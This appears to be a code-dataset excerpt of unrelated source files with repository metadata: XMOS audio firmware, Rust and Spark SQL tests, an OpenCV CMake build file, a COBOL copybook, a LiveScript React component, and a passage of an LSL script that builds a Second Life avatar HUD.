else if ((MCLK_48 % curSamFreq) == 0)
{
mClk = MCLK_48;
}
/* Calculate master clock to bit clock (or DSD clock) divide for current sample freq
* e.g. 11.289600 / (176400 * 64) = 1 */
{
/* I2S has 32 bits per sample. *2 as 2 channels */
unsigned numBits = 64;
divide = mClk / ( curSamFreq * numBits);
/* TODO; we should catch and handle the case when divide is 0. Currently design will lock up */
}
{
unsigned curFreq = curSamFreq;
/* Configure Clocking/CODEC/DAC/ADC for SampleFreq/MClk */
AudioHwConfig(curFreq, mClk, c_config, dsdMode, curSamRes_DAC, curSamRes_ADC);
}
if(!firstRun)
{
/* TODO wait for good mclk instead of delay */
/* No delay for DFU modes */
if ((curSamFreq != AUDIO_REBOOT_FROM_DFU) && (curSamFreq != AUDIO_STOP_FOR_DFU) && command)
{
/* Handshake back */
outct(c_mix_out, XS1_CT_END);
}
}
firstRun = 0;
par
{
{
/* Send decimation factor to PDM task(s) */
c_pdm_in <: curSamFreq;
command = deliver(c_mix_out, null, divide, curSamFreq, c_pdm_in, c);
if(command == SET_SAMPLE_FREQ)
{
curSamFreq = inuint(c_mix_out);
}
else if(command == SET_STREAM_FORMAT_OUT)
{
/* Off = 0
* DOP = 1
* Native = 2
*/
dsdMode = inuint(c_mix_out);
curSamRes_DAC = inuint(c_mix_out);
}
/* Currently no more audio will happen after this point */
if (curSamFreq == AUDIO_STOP_FOR_DFU)
{
outct(c_mix_out, XS1_CT_END);
outuint(c_mix_out, 0);
while (1)
{
[[combine]]
par
{
DFUHandler(dfuInterface, null);
dummy_deliver(c_mix_out, command);
}
curSamFreq = inuint(c_mix_out);
if (curSamFreq == AUDIO_START_FROM_DFU)
{
outct(c_mix_out, XS1_CT_END);
break;
}
}
}
c_pdm_in <: 0;
}
}
}
}
| XC | 5 | simongapp/xmos_usb_mems_interface | 01Firmware/PDM_USB/PDM_USB/src/audio.xc | [
"Unlicense"
] |
// run-rustfix
#![feature(in_band_lifetimes)]
#![deny(single_use_lifetimes)]
#![allow(dead_code)]
#![allow(unused_variables)]
// Test that we DO warn when lifetime name is used only
// once in a fn argument, even with in band lifetimes.
fn a(x: &'a u32, y: &'b u32) {
//~^ ERROR `'a` only used once
//~| ERROR `'b` only used once
//~| HELP elide the single-use lifetime
//~| HELP elide the single-use lifetime
}
fn main() { }
| Rust | 4 | Eric-Arellano/rust | src/test/ui/single-use-lifetime/one-use-in-fn-argument-in-band.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
-include ../../run-make-fulldeps/tools.mk
# Regression test for issue #10971
# Running two invocations in parallel would overwrite each other's temp files.
all:
touch $(TMPDIR)/lib.rs
$(RUSTC) --crate-type=lib -Z temps-dir=$(TMPDIR)/temp1 $(TMPDIR)/lib.rs & \
$(RUSTC) --crate-type=staticlib -Z temps-dir=$(TMPDIR)/temp2 $(TMPDIR)/lib.rs
| Makefile | 3 | ohno418/rust | src/test/run-make/issue-10971-temps-dir/Makefile | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
:- write('OK'), nl. | Prolog | 0 | ShaneLee/piston | packages/prolog/8.2.4/test.prolog | [
"MIT"
] |
---
title: Elements
layout: documentation
doc-tab: elements
hide_tabs: true
hide_pagination: true
breadcrumb:
- home
- documentation
- elements
---
{% include components/links.html category_id='elements' %}
| HTML | 1 | kalpitzeta/bulma | docs/documentation/elements.html | [
"MIT"
] |
# This file is included from a subdirectory
set(PYTHON_SOURCE_DIR "${CMAKE_CURRENT_LIST_DIR}")
ocv_add_module(${MODULE_NAME} BINDINGS PRIVATE_REQUIRED opencv_python_bindings_generator)
include_directories(SYSTEM
"${${PYTHON}_INCLUDE_PATH}"
${${PYTHON}_NUMPY_INCLUDE_DIRS}
)
ocv_module_include_directories(
"${PYTHON_SOURCE_DIR}/src2"
"${OPENCV_PYTHON_BINDINGS_DIR}"
)
# try to use dynamic symbols linking with libpython.so
set(OPENCV_FORCE_PYTHON_LIBS OFF CACHE BOOL "")
string(REPLACE "-Wl,--no-undefined" "" CMAKE_MODULE_LINKER_FLAGS "${CMAKE_MODULE_LINKER_FLAGS}")
if(NOT WIN32 AND NOT APPLE AND NOT OPENCV_PYTHON_SKIP_LINKER_EXCLUDE_LIBS)
set(CMAKE_MODULE_LINKER_FLAGS "${CMAKE_MODULE_LINKER_FLAGS} -Wl,--exclude-libs=ALL")
endif()
ocv_add_library(${the_module} MODULE
${PYTHON_SOURCE_DIR}/src2/cv2.cpp
${PYTHON_SOURCE_DIR}/src2/cv2_util.cpp
${PYTHON_SOURCE_DIR}/src2/cv2_numpy.cpp
${PYTHON_SOURCE_DIR}/src2/cv2_convert.cpp
${PYTHON_SOURCE_DIR}/src2/cv2_highgui.cpp
${cv2_generated_hdrs}
${opencv_userdef_hdrs}
${cv2_custom_hdr}
)
if(TARGET gen_opencv_python_source)
add_dependencies(${the_module} gen_opencv_python_source)
endif()
ocv_assert(${PYTHON}_VERSION_MAJOR)
ocv_assert(${PYTHON}_VERSION_MINOR)
if(${PYTHON}_LIMITED_API)
# support only python3.3+
ocv_assert(${PYTHON}_VERSION_MAJOR EQUAL 3 AND ${PYTHON}_VERSION_MINOR GREATER 2)
target_compile_definitions(${the_module} PRIVATE CVPY_DYNAMIC_INIT)
if(WIN32)
string(REPLACE
"python${${PYTHON}_VERSION_MAJOR}${${PYTHON}_VERSION_MINOR}.lib"
"python${${PYTHON}_VERSION_MAJOR}.lib"
${PYTHON}_LIBRARIES
"${${PYTHON}_LIBRARIES}")
endif()
endif()
if(APPLE)
set_target_properties(${the_module} PROPERTIES LINK_FLAGS "-undefined dynamic_lookup")
elseif(WIN32 OR OPENCV_FORCE_PYTHON_LIBS)
if(${PYTHON}_DEBUG_LIBRARIES AND NOT ${PYTHON}_LIBRARIES MATCHES "optimized.*debug")
ocv_target_link_libraries(${the_module} PRIVATE debug ${${PYTHON}_DEBUG_LIBRARIES} optimized ${${PYTHON}_LIBRARIES})
else()
ocv_target_link_libraries(${the_module} PRIVATE ${${PYTHON}_LIBRARIES})
endif()
endif()
if(TARGET gen_opencv_python_source)
set(deps ${OPENCV_MODULE_${the_module}_DEPS})
list(REMOVE_ITEM deps opencv_python_bindings_generator) # don't add dummy module to target_link_libraries list
endif()
ocv_target_link_libraries(${the_module} PRIVATE ${deps})
if(DEFINED ${PYTHON}_CVPY_SUFFIX)
set(CVPY_SUFFIX "${${PYTHON}_CVPY_SUFFIX}")
else()
set(__python_ext_suffix_var "EXT_SUFFIX")
if("${${PYTHON}_VERSION_MAJOR}" STREQUAL "2")
set(__python_ext_suffix_var "SO")
endif()
execute_process(COMMAND ${${PYTHON}_EXECUTABLE} -c "import sysconfig; print(sysconfig.get_config_var('${__python_ext_suffix_var}'))"
RESULT_VARIABLE PYTHON_CVPY_PROCESS
OUTPUT_VARIABLE CVPY_SUFFIX
OUTPUT_STRIP_TRAILING_WHITESPACE)
if(NOT PYTHON_CVPY_PROCESS EQUAL 0)
set(CVPY_SUFFIX ".so")
endif()
if(${PYTHON}_LIMITED_API)
if(WIN32)
string(REGEX REPLACE "\\.[^\\.]*\\." "." CVPY_SUFFIX "${CVPY_SUFFIX}")
else()
string(REGEX REPLACE "\\.[^\\.]*\\." ".abi${${PYTHON}_VERSION_MAJOR}." CVPY_SUFFIX "${CVPY_SUFFIX}")
endif()
endif()
endif()
ocv_update(OPENCV_PYTHON_EXTENSION_BUILD_PATH "${LIBRARY_OUTPUT_PATH}/${MODULE_INSTALL_SUBDIR}")
set_target_properties(${the_module} PROPERTIES
LIBRARY_OUTPUT_DIRECTORY "${OPENCV_PYTHON_EXTENSION_BUILD_PATH}"
ARCHIVE_OUTPUT_NAME ${the_module} # prevent name conflict for python2/3 outputs
PREFIX ""
OUTPUT_NAME cv2
SUFFIX "${CVPY_SUFFIX}")
if(ENABLE_SOLUTION_FOLDERS)
set_target_properties(${the_module} PROPERTIES FOLDER "bindings")
endif()
if(MSVC)
add_definitions(-DCVAPI_EXPORTS)
endif()
if((CV_GCC OR CV_CLANG) AND NOT ENABLE_NOISY_WARNINGS)
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Wno-unused-function")
endif()
if(MSVC AND NOT ENABLE_NOISY_WARNINGS)
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /wd4100") #unreferenced formal parameter
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /wd4127") #conditional expression is constant
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /wd4505") #unreferenced local function has been removed
string(REPLACE "/W4" "/W3" CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS}")
endif()
if(MSVC)
ocv_warnings_disable(CMAKE_CXX_FLAGS /wd4996)
else()
ocv_warnings_disable(CMAKE_CXX_FLAGS
-Wdeprecated-declarations
-Woverloaded-virtual -Wunused-private-field
-Wundef # accurate guard via #pragma doesn't work (C++ preprocessor doesn't handle #pragma)
)
endif()
if(MSVC AND NOT BUILD_SHARED_LIBS)
set_target_properties(${the_module} PROPERTIES LINK_FLAGS "/NODEFAULTLIB:atlthunk.lib /NODEFAULTLIB:atlsd.lib /DEBUG")
endif()
if(MSVC AND NOT ${PYTHON}_DEBUG_LIBRARIES)
set(PYTHON_INSTALL_CONFIGURATIONS CONFIGURATIONS Release)
else()
set(PYTHON_INSTALL_CONFIGURATIONS "")
endif()
if(WIN32)
set(PYTHON_INSTALL_ARCHIVE "")
else()
set(PYTHON_INSTALL_ARCHIVE ARCHIVE DESTINATION ${${PYTHON}_PACKAGES_PATH} COMPONENT python)
endif()
set(__python_loader_subdir "")
if(NOT OPENCV_SKIP_PYTHON_LOADER)
set(__python_loader_subdir "cv2/")
endif()
if(NOT " ${PYTHON}" STREQUAL " PYTHON"
AND NOT DEFINED OPENCV_PYTHON_INSTALL_PATH
)
if(DEFINED OPENCV_${PYTHON}_INSTALL_PATH)
set(OPENCV_PYTHON_INSTALL_PATH "${OPENCV_${PYTHON}_INSTALL_PATH}")
elseif(NOT OPENCV_SKIP_PYTHON_LOADER)
set(OPENCV_PYTHON_INSTALL_PATH "${${PYTHON}_PACKAGES_PATH}")
endif()
endif()
if(NOT OPENCV_SKIP_PYTHON_LOADER AND DEFINED OPENCV_PYTHON_INSTALL_PATH)
include("${CMAKE_CURRENT_LIST_DIR}/python_loader.cmake")
set(OPENCV_PYTHON_INSTALL_PATH_SETUPVARS "${OPENCV_PYTHON_INSTALL_PATH}" CACHE INTERNAL "")
endif()
if(OPENCV_SKIP_PYTHON_LOADER)
if(DEFINED OPENCV_${PYTHON}_INSTALL_PATH)
set(__python_binary_install_path "${OPENCV_${PYTHON}_INSTALL_PATH}")
elseif(DEFINED ${PYTHON}_PACKAGES_PATH)
set(__python_binary_install_path "${${PYTHON}_PACKAGES_PATH}")
else()
message(FATAL_ERROR "Specify 'OPENCV_${PYTHON}_INSTALL_PATH' variable")
endif()
else()
ocv_assert(DEFINED OPENCV_PYTHON_INSTALL_PATH)
if(${PYTHON}_LIMITED_API)
set(__python_binary_subdir "python-${${PYTHON}_VERSION_MAJOR}")
else()
set(__python_binary_subdir "python-${${PYTHON}_VERSION_MAJOR}.${${PYTHON}_VERSION_MINOR}")
endif()
set(__python_binary_install_path "${OPENCV_PYTHON_INSTALL_PATH}/${__python_loader_subdir}${__python_binary_subdir}")
endif()
install(TARGETS ${the_module}
${PYTHON_INSTALL_CONFIGURATIONS}
RUNTIME DESTINATION "${__python_binary_install_path}" COMPONENT python
LIBRARY DESTINATION "${__python_binary_install_path}" COMPONENT python
${PYTHON_INSTALL_ARCHIVE}
)
set(__INSTALL_PATH_${PYTHON} "${__python_binary_install_path}" CACHE INTERNAL "") # CMake status
if(NOT OPENCV_SKIP_PYTHON_LOADER)
ocv_assert(DEFINED OPENCV_PYTHON_INSTALL_PATH)
if(OpenCV_FOUND)
set(__loader_path "${OpenCV_BINARY_DIR}/python_loader")
else()
set(__loader_path "${CMAKE_BINARY_DIR}/python_loader")
endif()
set(__python_loader_install_tmp_path "${CMAKE_BINARY_DIR}${CMAKE_FILES_DIRECTORY}/install/python_loader/")
set(OpenCV_PYTHON_LOADER_FULL_INSTALL_PATH "${CMAKE_INSTALL_PREFIX}/${OPENCV_PYTHON_INSTALL_PATH}/cv2")
if(IS_ABSOLUTE "${OPENCV_PYTHON_INSTALL_PATH}")
set(CMAKE_PYTHON_EXTENSION_INSTALL_PATH_BASE "'${OPENCV_PYTHON_INSTALL_PATH}/cv2'")
else()
set(CMAKE_PYTHON_EXTENSION_INSTALL_PATH_BASE "LOADER_DIR")
endif()
if(DEFINED ${PYTHON}_VERSION_MINOR AND NOT ${PYTHON}_LIMITED_API)
set(__target_config "config-${${PYTHON}_VERSION_MAJOR}.${${PYTHON}_VERSION_MINOR}.py")
else()
set(__target_config "config-${${PYTHON}_VERSION_MAJOR}.py")
endif()
if(CMAKE_GENERATOR MATCHES "Visual Studio")
set(CMAKE_PYTHON_EXTENSION_PATH "'${OPENCV_PYTHON_EXTENSION_BUILD_PATH}/Release'") # TODO: CMAKE_BUILD_TYPE is not defined
else()
set(CMAKE_PYTHON_EXTENSION_PATH "'${OPENCV_PYTHON_EXTENSION_BUILD_PATH}'")
endif()
configure_file("${PYTHON_SOURCE_DIR}/package/template/config-x.y.py.in" "${__loader_path}/cv2/${__target_config}" @ONLY)
if(IS_ABSOLUTE __python_binary_install_path)
set(CMAKE_PYTHON_EXTENSION_PATH "'${__python_binary_install_path}'")
else()
file(RELATIVE_PATH OpenCV_PYTHON_BINARY_RELATIVE_INSTALL_PATH "${OpenCV_PYTHON_LOADER_FULL_INSTALL_PATH}" "${CMAKE_INSTALL_PREFIX}/${__python_binary_install_path}")
set(CMAKE_PYTHON_EXTENSION_PATH "os.path.join(${CMAKE_PYTHON_EXTENSION_INSTALL_PATH_BASE}, '${OpenCV_PYTHON_BINARY_RELATIVE_INSTALL_PATH}')")
endif()
configure_file("${PYTHON_SOURCE_DIR}/package/template/config-x.y.py.in" "${__python_loader_install_tmp_path}/cv2/${__target_config}" @ONLY)
install(FILES "${__python_loader_install_tmp_path}/cv2/${__target_config}" DESTINATION "${OPENCV_PYTHON_INSTALL_PATH}/cv2/" COMPONENT python)
endif() # NOT OPENCV_SKIP_PYTHON_LOADER
unset(PYTHON_SRC_DIR)
unset(PYTHON_CVPY_PROCESS)
unset(CVPY_SUFFIX)
unset(PYTHON_INSTALL_CONFIGURATIONS)
unset(PYTHON_INSTALL_ARCHIVE)
| CMake | 3 | yash112-lang/opencv | modules/python/common.cmake | [
"Apache-2.0"
] |
manifest.impl.vendor=JetBrains
manifest.impl.attribute.kotlin.version=Kotlin-Version
manifest.impl.attribute.kotlin.runtime.component=Kotlin-Runtime-Component
# suppress inspection "UnusedProperty" (Used reflectively in JvmRuntimeVersionsConsistencyChecker)
manifest.impl.value.kotlin.runtime.component.core=Core
manifest.impl.value.kotlin.runtime.component.main=Main
manifest.impl.title.kotlin.compiler=Kotlin Compiler
manifest.impl.title.kotlin.compiler.sources=Kotlin Compiler Sources
manifest.impl.title.kotlin.javascript.stdlib=Kotlin JavaScript StdLib | INI | 1 | qussarah/declare | resources/kotlinManifest.properties | [
"Apache-2.0"
] |
-- binary type
select x'00' < x'0f';
select x'00' < x'ff';
-- trim string to numeric
select '1 ' = 1Y;
select '\t1 ' = 1Y;
select '1 ' = 1S;
select '1 ' = 1;
select ' 1' = 1L;
select ' 1' = cast(1.0 as float);
select ' 1.0 ' = 1.0D;
select ' 1.0 ' = 1.0BD; | SQL | 2 | OlegPt/spark | sql/core/src/test/resources/sql-tests/inputs/comparator.sql | [
"Apache-2.0"
] |
01 COMPANY-DETAILS.
05 SEGMENT-ID PIC X(5).
05 COMPANY-ID PIC X(10).
05 STATIC-DETAILS.
10 COMPANY-NAME PIC X(15).
10 ADDRESS PIC X(25).
10 TAXPAYER.
15 TAXPAYER-TYPE PIC X(1).
15 TAXPAYER-STR PIC X(8).
15 TAXPAYER-NUM REDEFINES TAXPAYER-STR
PIC 9(8) COMP.
10 STRATEGY.
15 STRATEGY_DETAIL OCCURS 6.
25 NUM1 PIC 9(7) COMP.
25 NUM2 PIC 9(7) COMP-3.
| COBOL | 3 | gryphus-lab/kafka-connect-fs | src/test/resources/file/reader/data/cobol/companies.cpy | [
"Apache-2.0"
] |
{filter, find, map, pairs-to-obj} = require \prelude-ls
{create-factory}:React = require \react
{div, span} = require \react-dom-factories
{find-DOM-node} = require \react-dom
AceEditor = create-factory require \./AceEditor.ls
{debounce} = require \underscore
create-react-class = require \create-react-class
module.exports = create-react-class do
display-name: \Example
# get-default-props :: a -> Props
get-default-props: ->
# height :: Int
# initial-language :: String
languages: [] # :: [Language], where Language :: {id :: String, name :: String, initial-content :: String, compile :: String -> String}
style: {}
# render :: a -> VirtualDOMElement
render: ->
div do
class-name: \example
style: @props.style
div class-name: \title, @props.title
div class-name: \description, @props.description
div null,
# TAB CONTAINER
div class-name: \tab-container,
# TABS (one for each language)
div class-name: \languages,
@props.languages |> map ({id, name}) ~>
div do
key: id
class-name: if id == @state.language then \selected else ''
on-click: ~>
<~ @set-state language: id
@execute!
"#{name}#{if id == @state.language then ' - live editor' else ''}"
# CODE EDITOR
AceEditor do
editor-id: @.props.title.replace /\s/g, '' .to-lower-case! .trim!
class-name: \editor
width: @props.width
height: @props.height
mode: "ace/mode/#{@state.language}"
value: @state[@state.language]
on-change: (value) ~>
<~ @set-state {"#{@state.language}" : value}
@debounced-execute!
commands:
* name: \execute
exec: ~> @.execute!
bind-key:
mac: "cmd-enter"
win: "ctrl-enter"
...
# ERROR (compilation & runtime)
if !!@state.err
div class-name: \error, @state.err
# OUTPUT
else
div do
class-name: \output
ref: \output
# get-initial-state :: a -> UIState
get-initial-state: ->
@props.languages
|> map ({id, initial-content}) -> [id, initial-content]
|> pairs-to-obj
|> ~> it <<<
component: undefined
err: undefined
language: @props.initial-language
# execute :: a -> Void
execute: !->
{on-execute}? = @props.languages |> find ~> it.id == @state.language
<~ @set-state err: undefined
# compile
try
on-execute @state[@state.language], find-DOM-node @refs.output
catch err
@set-state err: err.to-string!
# component-did-mount :: a -> Void
component-did-mount: !->
@execute!
@debounced-execute = debounce @.execute, 600 | LiveScript | 5 | rodcope1/react-selectize-rodcope1 | public/components/Example.ls | [
"Apache-2.0"
] |
//*********************************************************************************
//** This program is free software: you can redistribute it and/or modify
//** it under the terms of the GNU Affero General Public License as
//** published by the Free Software Foundation, either version 3 of the
//** License, or (at your option) any later version.
//**
//** This program is distributed in the hope that it will be useful,
//** but WITHOUT ANY WARRANTY; without even the implied warranty of
//** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
//** GNU Affero General Public License for more details.
//**
//** You should have received a copy of the GNU Affero General Public License
//** along with this program. If not, see <https://www.gnu.org/licenses/>
//*********************************************************************************
// ss-c 31Dec2018 <seriesumei@avimail.org> - Combined HUD
// ss-d 03Jan2019 <seriesumei@avimail.org> - Add skin panel
// ss-e 10Feb2019 <seriesumei@avimail.org> - Add option panel
// ss-f 31Mar2019 <seriesumei@avimail.org> - Fix textures for SL vs OpenSim
// ss-g 02Apr2019 <seriesumei@avimail.org> - Add skin buttons and tweak textures
// This builds a multi-paned HUD for Ruth/Roth that includes the existing
// alpha HUD mesh and adds panes for a different skin applier than Shin's
// and an Options pane that currently has fingernail shape/color and toenail
// color buttons.
//
// To build the 'uniHUD' from scratch you will need to:
// * Upload or obtain via whatever means the Alpha HUD mesh and the 'doll'
// mesh. This script will throw an error if you start with a pre-linked
// alpha HUD but it should work anyway. To prepare the alpha hud and doll
// meshes:
// * Remove all scripts
// * Make sure that the 'rotatebar' link is the root of the HUD linkset and
// the 'chest' link is the root of the doll linkset. Thse are used for
// positioning, even so SL gets the positioning wrong compares to OpenSim.
// * Create a new empty box prim named 'Object' and take a copy of it into
// inventory
// * Copy the folloing objects into the new box's inventory on the ground:
// * the new box from inventory created above and name it 'Object'
// * the alpha HUD mesh and name it 'alpha-hud'
// * if the doll mes is not already linked into the alpha HUD linkset copy
// it and name it 'doll'
// * the button meshes named '2x1 button' and 5x button'
// * this script
// * Light fuse (touch the box prim) and get away, the new HUD will be
// assembled around the box prim which will become the root prim of the HUD.
// * The alpha HUD and the doll will not be linked as they may need size
// and/or position adjustments depending on how your mesh is linked. Since
// they are both linksets you do not want to link them to the main HUD until
// you are very satisfied with their position. Then link them and rejoice.
// * Rename the former root prim of the alpha HUD mesh, if it was the rotation
// bar at the bottom name it 'rotatebar'. Remove any script if it is still
// present.
// * Rename the former root prim of the doll according to the usual doll link
// names.
// * Make any position and size adjustments as necessary to the alpha HUD mesh
// and doll, then link them both to the new HUD root prim. Make sure that
// the center square HUD prim is last so it remains the root of the linkset.
// * Remove this script from the HUD root prim and copy in the HUD script(s).
// * The other objects are also not needed any longer in the root prim and
// can be removed.
vector build_pos;
integer link_me = FALSE;
integer FINI = FALSE;
integer counter = 0;
key bar_texture;
key hud_texture;
key options_texture;
key fingernails_shape_texture;
vector bar_size = <0.5, 0.5, 0.04>;
vector hud_size = <0.5, 0.5, 0.5>;
vector color_button_size = <0.01, 0.145, 0.025>;
vector shape_button_size = <0.01, 0.295, 0.051>;
// Spew debug info
integer VERBOSE = TRUE;
// Hack to detect Second Life vs OpenSim
// Relies on a bug in llParseString2List() in SL
// http://grimore.org/fuss/lsl/bugs#splitting_strings_to_lists
integer is_SL() {
string sa = "12999";
// list OS = [1,2,9,9,9];
list SL = [1,2,999];
list la = llParseString2List(sa, [], ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]);
return (la == SL);
}
// The four textures used in the HUD referenced below are included in the repo:
// bar_texture: ruth 2.0 hud header.png
// hud_texture: ruth 2.0 hud background gradient.png
// options_texture: ruth 2.0 hud options gradient.png
// fingernails_shape_texture: ruth 2.0 hud fingernails shape.png
get_textures() {
if (is_SL()) {
// Textures in SL
// The textures listed are full-perm uploaded by seriesumei Resident
bar_texture = "d5aeccd4-f3ff-bea6-1296-07e8e0453275";
hud_texture = "76dbff9c-c2fd-ffe9-a37f-cb9e42f722fe";
options_texture = "1186285b-cc82-7602-71f0-8ad0eb1762b2";
fingernails_shape_texture = "fb6ee827-3c3e-99a8-0e33-47015c0845a9";
} else {
string grid_name = "";
// This will not compile in Second Life as it is an OpenSim-specific
// function. Comment out the following line for SL:
grid_name = osGetGridName();
if (grid_name == "OSGrid") {
// Textures in OSGrid
// TODO: Bad assumption that OpenSim == OSGrid, how do we detect
// which grid? osGetGridName() is an option but does not
// compile in SL so editing the script would stll be required.
// Maybe we don't care too much about that?
// The textures listed are full-perm uploaded by serie sumei to OSGrid
bar_texture = "dc2612bd-e230-47f3-8888-d9a14b652f7d";
hud_texture = "c76f327a-a431-4219-8913-78c7adfe0d02";
options_texture = "86717f80-d201-4cf5-ab4c-1d77e5bd8e55";
fingernails_shape_texture = "fe777245-4fa2-4834-b794-0c29fa3e1fcf";
} else {
log("OpenSim detected but grid " + grid_name() + " unknown, using blank textures");
bar_texture = TEXTURE_BLANK;
hud_texture = TEXTURE_BLANK;
options_texture = TEXTURE_BLANK;
fingernails_shape_texture = TEXTURE_BLANK;
}
}
}
log(string txt) {
if (VERBOSE) {
llOwnerSay(txt);
}
}
rez_object(string name, vector delta, vector rot) {
vector build_pos = llGetPos();
build_pos += delta;;
log("Rezzing " + name);
llRezObject(
name,
build_pos,
<0.0, 0.0, 0.0>,
llEuler2Rot(rot),
0
);
}
configre_bar(string name, float offset_y) {
log("Configuring " + name);
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, name,
PRIM_TEXTURE, ALL_SIDES, bar_texture, <1.0, 0.1, 0.0>, <0.0, offset_y, 0.0>, 0.0,
PRIM_TEXTURE, 0, TEXTURE_TRANSPARENT, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 5, TEXTURE_TRANSPARENT, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_COLOR, ALL_SIDES, <1.0, 1.0, 1.0>, 1.00,
PRIM_SIZE, bar_size
]);
}
configure_color_buttons(string name) {
log("Configuring " + name);
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, name,
PRIM_COLOR, ALL_SIDES, <1.0, 1.0, 1.0>, 1.00,
PRIM_COLOR, 3, <0.3, 0.3, 0.3>, 1.00,
PRIM_COLOR, 4, <0.6, 0.6, 0.6>, 1.00,
PRIM_SIZE, color_button_size
]);
}
default {
touch_start(integer total_number) {
get_textures();
counter = 0;
// set up root prim
log("Configuring root");
llSetLinkPrimitiveParamsFast(LINK_THIS, [
PRIM_NAME, "HUD base",
PRIM_SIZE, <0.1, 0.1, 0.1>,
PRIM_TEXTURE, ALL_SIDES, TEXTURE_TRANSPARENT, <0,0,0>, <0.0, 0.455, 0.0>, 0.0,
PRIM_COLOR, ALL_SIDES, <1.0, 1.0, 1.0>, 1.00
]);
// See if we'll be able to link to trigger build
llRequestPermissions(llGetOwner(), PERMISSION_CHANGE_LINKS);
}
run_time_permissions(integer perm) {
// Only bother rezzing the object if will be able to link it.
if (perm & PERMISSION_CHANGE_LINKS) {
// log("Rezzing south");
link_me = TRUE;
rez_object("Object", <0.0, 0.0, -0.5>, <0.0, 0.0, 0.0>);
} else {
llOwnerSay("unable to link objects, aborting build");
}
}
object_rez(key id) {
counter++;
integer i = llGetNumberOfPrims();
log("counter="+(string)counter);
if (link_me) {
llCreateLink(id, TRUE);
link_me = FALSE;
}
if (counter == 1) {
configre_bar("minbar", 0.440);
// log("Rezzing east");
link_me = TRUE;
rez_object("Object", <0.0, -0.5, 0.0>, <-PI_BY_TWO, 0.0, 0.0>);
}
else if (counter == 2) {
configre_bar("optionbar", 0.065);
// log("Rezzing north");
link_me = TRUE;
rez_object("Object", <0.0, 0.0, 0.5>, <PI, 0.0, 0.0>);
}
else if (counter == 3) {
configre_bar("skinbar", 0.190);
// log("Rezzing west");
link_me = TRUE;
rez_object("Object", <0.0, 0.5, 0.0>, <PI_BY_TWO, 0.0, 0.0>);
}
else if (counter == 4) {
configre_bar("alphabar", 0.314);
log("Rezzing option HUD");
link_me = TRUE;
rez_object("Object", <0.0, -0.76953, 0.0>, <-PI_BY_TWO, 0.0, 0.0>);
}
else if (counter == 5) {
log("Configuring option HUD");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "optionbox",
PRIM_TEXTURE, ALL_SIDES, options_texture, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_COLOR, ALL_SIDES, <1.0, 1.0, 1.0>, 1.00,
PRIM_SIZE, hud_size
]);
log("Rezzing skin HUD");
link_me = TRUE;
rez_object("Object", <0.0, 0.0, 0.76953>, <PI, 0.0, 0.0>);
}
else if (counter == 6) {
log("Configuring skin HUD");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "skinbox",
PRIM_TEXTURE, ALL_SIDES, hud_texture, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_COLOR, ALL_SIDES, <1.0, 1.0, 1.0>, 1.00,
PRIM_SIZE, hud_size
]);
log("Rezzing alpha HUD");
link_me = FALSE;
rez_object("alpha-hud", <0.0, 0.811, 0.0>, <PI_BY_TWO, 0.0, -PI_BY_TWO>);
}
else if (counter == 7) {
log("Rezzing alpha doll");
link_me = FALSE;
rez_object("doll", <0.0, 0.78, 0.0>, <PI_BY_TWO, 0.0, -PI_BY_TWO>);
}
else if (counter == 8) {
log("Rezzing buttons");
link_me = TRUE;
rez_object("5x button", <-0.2488, -0.6, -0.03027>, <-PI_BY_TWO, 0.0, 0.0>);
}
else if (counter == 9) {
configure_color_buttons("fnc0");
log("Rezzing buttons");
link_me = TRUE;
rez_object("5x button", <-0.2488, -0.6, 0.11965>, <-PI_BY_TWO, 0.0, 0.0>);
}
else if (counter == 10) {
configure_color_buttons("fnc1");
log("Rezzing buttons");
link_me = TRUE;
rez_object("5x button", <-0.2488, -0.64849, 0.04468>, <-PI_BY_TWO, 0.0, 0.0>);
}
else if (counter == 11) {
log("Configuring buttons");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "fns0",
PRIM_TEXTURE, ALL_SIDES, TEXTURE_BLANK, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 5, fingernails_shape_texture, <0.25, 1.0, 0.0>, <-0.375, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 6, fingernails_shape_texture, <0.25, 1.0, 0.0>, <-0.125, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 1, fingernails_shape_texture, <0.25, 1.0, 0.0>, <0.125, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 2, fingernails_shape_texture, <0.25, 1.0, 0.0>, <0.375, 0.0, 0.0>, 0.0,
PRIM_COLOR, ALL_SIDES, <1.0, 1.0, 1.0>, 1.00,
PRIM_COLOR, 3, <0.3, 0.3, 0.3>, 1.00,
PRIM_COLOR, 4, <0.6, 0.6, 0.6>, 1.00,
PRIM_COLOR, 0, <0.0, 0.0, 0.0>, 1.00,
PRIM_SIZE, shape_button_size
]);
log("Rezzing buttons");
link_me = TRUE;
rez_object("5x button", <-0.2488, -0.73976, -0.03027>, <-PI_BY_TWO, 0.0, 0.0>);
}
else if (counter == 12) {
configure_color_buttons("tnc0");
log("Rezzing buttons");
link_me = TRUE;
rez_object("5x button", <-0.2488, -0.73976, 0.11965>, <-PI_BY_TWO, 0.0, 0.0>);
}
else if (counter == 13) {
configure_color_buttons("tnc1");
log("Rezzing buttons");
link_me = TRUE;
// z=0.76953
rez_object("1x2 button", <-0.25, -0.1, 0.6333>, <PI, 0.0, 0.0>);
}
else if (counter == 14) {
